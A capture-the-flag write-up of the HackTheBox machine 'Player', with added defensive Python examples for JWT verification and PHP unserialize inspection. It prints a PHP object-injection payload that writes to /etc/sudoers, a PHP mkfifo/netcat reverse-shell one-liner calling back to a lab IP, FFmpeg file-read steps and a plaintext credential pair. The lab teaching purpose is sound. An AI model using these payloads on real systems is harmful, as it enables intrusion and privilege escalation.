
Hackthebox Player Writeup


In this article you will learn the following:

  • Scanning targets using nmap.
  • Identifying a PHP backup file.
  • Playing with JWT (JSON Web Token).
  • Exploiting FFmpeg software.
  • Scanning for vhosts.
  • Exploiting the OpenSSH 7.2p1 xauth command injection.
  • Identifying and exploiting the Codiad web-based IDE.
  • Escaping a limited shell.
  • Monitoring processes via pspy64.
  • Exploiting POI (PHP Object Injection).

 

Port Scan:

22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.11
80/tcp open http Apache httpd 2.4.7
6686/tcp open ssh OpenSSH 7.2 (protocol 2.0)

 

Enumeration:

First, I checked HTTP on port 80 and got a forbidden page, so I ran gobuster to brute-force directories.

I found /launcher (301), which opens an application named playBuf.

I checked the application's features with Burp Suite.

I found that the (Send) button makes a GET request to another page that sets a JWT and then redirects us to index.html, so I looked at the JWT with https://jwt.io.

After a lot of enumeration I found a backup of this page at http://10.10.10.145/launcher/dee8dc8a47256c64630d803a4c40786c.php~, which contains the code that generates and decodes the JWT.

I started analyzing the PHP code: it replaces the '_' in the key with '/' and then base64-decodes it.

Once I knew what the code does, the next thing to look at was a check that the access_code inside the access variable in the cookie matches '0E76658526655756207688271159624026011393'; when it matches we are redirected to a new directory. So we write a simple PHP script that changes the access_code and re-signs it with the right key.

After running the code I got the new JWT.

I changed the token and sent it to dee8dc8a47256c64630d803a4c40786c.php, which redirected me to a new directory, 7F2dcsSdZo6nj3SNMTQ1/, with a new application.
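The token trick above rests on one thing: whoever holds the signing key can mint a token with any access_code, and the leaked .php~ backup handed that key over. As an added example (not code from the writeup or the box), here is a Python sketch of HS256 issue-and-verify with the checks a server must do before trusting a payload, plus a demonstration that editing the payload without the key is rejected. The key is constructed; the page does not name the signing algorithm, so HS256 is an assumption, and only the key-decoding step ('_' to '/', then base64) is taken from the page.

```python
import base64
import hashlib
import hmac
import json

# Constructed key for this example (not the box's real key). The page's PHP code stores
# its key encoded and rebuilds it by replacing '_' with '/' and base64-decoding, so the
# constant here is kept in that same shape.
ENCODED_KEY = base64.b64encode(b"constructed-demo-key, not the real one").decode().replace("/", "_")


def derive_key(encoded: str) -> bytes:
    """Undo the page's key encoding: '_' -> '/', then base64-decode."""
    return base64.b64decode(encoded.replace("_", "/"))


def b64url_encode(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))


def sign_jwt(claims: dict, key: bytes) -> str:
    """Issue an HS256 JWT: header.payload.HMAC-SHA256(header.payload)."""
    header = {"typ": "JWT", "alg": "HS256"}
    segments = [
        b64url_encode(json.dumps(header, separators=(",", ":")).encode()),
        b64url_encode(json.dumps(claims, separators=(",", ":")).encode()),
    ]
    signature = hmac.new(key, ".".join(segments).encode(), hashlib.sha256).digest()
    return ".".join(segments + [b64url_encode(signature)])


def verify_jwt(token: str, key: bytes):
    """Return the claims if the token verifies, else None.

    These are the checks a server must do before trusting anything in the payload:
    exactly three segments, the algorithm we issued (no 'none', no algorithm switching),
    and a constant-time comparison of the HMAC.
    """
    try:
        head, body, sig = token.split(".")
        header = json.loads(b64url_decode(head))
        if not isinstance(header, dict) or header.get("alg") != "HS256":
            return None
        expected = hmac.new(key, f"{head}.{body}".encode(), hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(sig)):
            return None
        claims = json.loads(b64url_decode(body))
    except ValueError:  # wrong segment count, bad base64, or bad JSON
        return None
    return claims if isinstance(claims, dict) else None


def swap_payload_keep_signature(token: str, new_claims: dict) -> str:
    """Replace the payload but keep the old signature: all that is possible without the key."""
    head, _, sig = token.split(".")
    body = b64url_encode(json.dumps(new_claims, separators=(",", ":")).encode())
    return ".".join([head, body, sig])


if __name__ == "__main__":
    key = derive_key(ENCODED_KEY)
    token = sign_jwt({"access": {"access_code": "constructed-low-privilege-code"}}, key)
    print("valid token            ->", verify_jwt(token, key))
    edited = swap_payload_keep_signature(token, {"access": {"access_code": "anything-else"}})
    print("payload swapped, no key ->", verify_jwt(edited, key))
    reissued = sign_jwt({"access": {"access_code": "anything-else"}}, key)
    print("re-signed with the key  ->", verify_jwt(reissued, key))
```

The last line of the demo is the whole lesson of the .php~ file: once the key is readable by a client, the signature stops meaning anything, so the key must live outside the web root and backups must never be served.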

After some enumeration I found it was FFmpeg (an open-source project for processing audio and video formats). There is an SSRF exploit in this software; this is a good report from HackerOne: https://hackerone.com/reports/115978

Using the script that generates a .avi file for LFI (https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Upload%20Insecure%20Files/CVE%20Ffmpeg%20HLS), I uploaded the .avi file to the system.

By clicking on "Buffed Media" and downloading the resulting .avi file, here's the magic: I got the server's passwd file.

– I used a script to brute-force vhosts, filtering on status code and content length, and found 2 vhosts:

* ruby scan.rb --ip=10.10.10.145 --host=player.htb
* dev.player.htb, staging.player.htb

 

I found error messages on some features; after checking all pages and trying all features, there is an error message in contact.php.

I found two files on the server, which I read using the FFmpeg SSRF exploit:

* python gen_avi.py file:///var/www/backup/service_config config.avi

I got credentials from /var/www/backup/service_config.

I tried these credentials over SSH and got lshell (a limited shell).

I searched for an OpenSSH 7.2 exploit and found one.

After running the script I got shell access as user.

I read the fix.php file, which I had not read before, and got new credentials: peter:CQXpm\z)G5D#%S$y=

– After a lot of enumeration and trying these creds over SSH with no success, I found that they are valid on http://dev.player.htb/, which opens a new system for us.

After some searching and digging into the source code, I found what it was:

– I found the word ( codiad ), searched for it on Google and found a Codiad RCE
* https://github.com/WangYihang/Codiad-Remote-Code-Execute-

I tried it with Peter's creds, it worked, and I got a shell.

After getting a reverse shell I tried to switch user to telegen, but lshell is in the way. So I searched for how to bypass it and found there is an option:

* su telegen -s /bin/bash

After an hour I decided to get pspy64 onto the box to watch the processes, and I found a cronjob run by root in an interesting path:
* python -m SimpleHTTPServer 80
* wget http://10.10.14.20/pspy64

I checked the /var/lib/playbuff directory to see what was in it.

Then I saw buff.php, which uses serialization. A good link for this type of attack:

Remote code execution via PHP [Unserialize]


– There are two ways to get root:

  • PHP object injection.
  • Switch to www-data and change the database connection file into a reverse shell: /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php

Method 1: via POI ( PHP Object Injection )

I used the object injection to write into /etc/sudoers so that user telegen can run anything:
– telegen ALL=(ALL)ALL
Payload:
echo 'O:8:"playBuff":2:{s:7:"logFile";s:53:"/var/lib/playbuff/../../../../../../../../etc/sudoers";s:7:"logData";s:20:"telegen ALL=(ALL)ALL";}' > merge.log
– wait 1 min
– sudo -l
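The payload above is a serialized playBuff object with its logFile property pointed outside /var/lib/playbuff; the root cronjob hands merge.log to unserialize(), which rebuilds the object and lets its file-writing code run. From the defender's side, the useful tool is one that reads PHP's serialize() format without instantiating anything and says what a blob would create. As an added example (not code from the writeup, the box, or any PHP project), here is a small Python parser for that format plus an inspection pass that flags class instantiation, "../" sequences and sensitive paths; it is run over the page's own payload and over a constructed benign array. The class name playBuff and the payload are from the page; the benign input and the sensitive-path list are constructed.

```python
# Minimal parser for PHP's serialize() format. It produces plain Python values and a
# PhpObject record instead of live objects, so a blob can be triaged before (or instead
# of) ever reaching unserialize().

class PhpObject:
    """A serialized object seen in the input: class name and properties, never instantiated."""

    def __init__(self, cls: str, props: dict):
        self.cls = cls
        self.props = props

    def __repr__(self):
        return f"PhpObject({self.cls!r}, {self.props!r})"


def php_unserialize(data):
    """Parse a serialize() blob (str or bytes) into Python values; raises ValueError on bad input."""
    if isinstance(data, str):
        data = data.encode()
    try:
        value, pos = _parse(data, 0)
    except IndexError:
        raise ValueError("truncated input") from None
    if pos != len(data):
        raise ValueError(f"trailing data at offset {pos}")
    return value


def _read_string(data: bytes, pos: int):
    """Read <len>:"<bytes>" at pos; return (text, offset just after the closing quote)."""
    colon = data.index(b":", pos)
    length = int(data[pos:colon])          # PHP lengths are byte counts, hence bytes throughout
    start = colon + 2                      # skip :"
    end = start + length
    if data[end:end + 1] != b'"':
        raise ValueError(f"string length mismatch at offset {pos}")
    return data[start:end].decode("utf-8", "replace"), end + 1


def _read_pairs(data: bytes, pos: int, count: int):
    """Read count key/value pairs followed by '}'; pos must point just after '{'."""
    out = {}
    for _ in range(count):
        key, pos = _parse(data, pos)
        value, pos = _parse(data, pos)
        out[key] = value
    if data[pos:pos + 1] != b"}":
        raise ValueError(f"expected '}}' at offset {pos}")
    return out, pos + 1


def _parse(data: bytes, pos: int):
    tag = chr(data[pos])
    if tag == "N":                                   # N;
        return None, pos + 2
    if tag in "ibd":                                 # i:42;  b:1;  d:1.5;
        end = data.index(b";", pos)
        raw = data[pos + 2:end].decode()
        value = {"i": int, "b": lambda v: v == "1", "d": float}[tag](raw)
        return value, end + 1
    if tag == "s":                                   # s:<len>:"<text>";
        text, pos = _read_string(data, pos + 2)
        if data[pos:pos + 1] != b";":
            raise ValueError(f"expected ';' at offset {pos}")
        return text, pos + 1
    if tag == "a":                                   # a:<count>:{key value ...}
        colon = data.index(b":", pos + 2)
        return _read_pairs(data, colon + 2, int(data[pos + 2:colon]))
    if tag == "O":                                   # O:<len>:"<class>":<count>:{key value ...}
        cls, pos = _read_string(data, pos + 2)       # pos now sits on the ':' before the count
        colon = data.index(b":", pos + 1)
        props, pos = _read_pairs(data, colon + 2, int(data[pos + 1:colon]))
        return PhpObject(cls, props), pos
    raise ValueError(f"unknown type tag {tag!r} at offset {pos}")


# Constructed list of path fragments that should never appear in application-controlled file names.
SENSITIVE_PATHS = ("/etc/", "/root/", "/var/spool/cron", "/.ssh/", "authorized_keys")


def inspect_value(value, path="$"):
    """Walk a parsed value and list what a reviewer, or a rule on the log ingest, should flag."""
    findings = []
    if isinstance(value, PhpObject):
        findings.append(f"{path}: instantiates class {value.cls!r} with {len(value.props)} properties")
        for name, prop in value.props.items():
            findings += inspect_value(prop, f"{path}->{name}")
    elif isinstance(value, dict):
        for name, item in value.items():
            findings += inspect_value(item, f"{path}[{name!r}]")
    elif isinstance(value, str):
        if "../" in value:
            findings.append(f"{path}: directory traversal in {value!r}")
        if any(marker in value for marker in SENSITIVE_PATHS):
            findings.append(f"{path}: sensitive path in {value!r}")
    return findings


# The page's own payload, as written to merge.log for the root cronjob to unserialize.
PAGE_PAYLOAD = ('O:8:"playBuff":2:{s:7:"logFile";s:53:"/var/lib/playbuff/../../../../../../../../etc/sudoers";'
                's:7:"logData";s:20:"telegen ALL=(ALL)ALL";}')
# Constructed benign input of the kind an application might legitimately store.
BENIGN = 'a:2:{s:4:"user";s:5:"guest";s:5:"score";i:42;}'

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN), ("page payload", PAGE_PAYLOAD)):
        parsed = php_unserialize(blob)
        print(f"{label}: {parsed!r}")
        for line in inspect_value(parsed) or ["  no findings"]:
            print(" ", line)
```

Run against the page's payload this reports one class instantiation, one traversal and one sensitive path, all on logFile, which is exactly the signal a cron-fed file should never produce. The fix on the PHP side is to stop feeding a file that an unprivileged user can write into unserialize() at all, or at minimum to call it with ['allowed_classes' => false] so that no class (and no destructor) is ever instantiated from that input.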

Method 2: via editing the database file

Payload:
echo '<?php system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.20 9909 >/tmp/f");?>' > /var/www/html/launcher/dee8dc8a47256c64630d803a4c40786g.php
– nc -lvp 9909
– wait 1 min
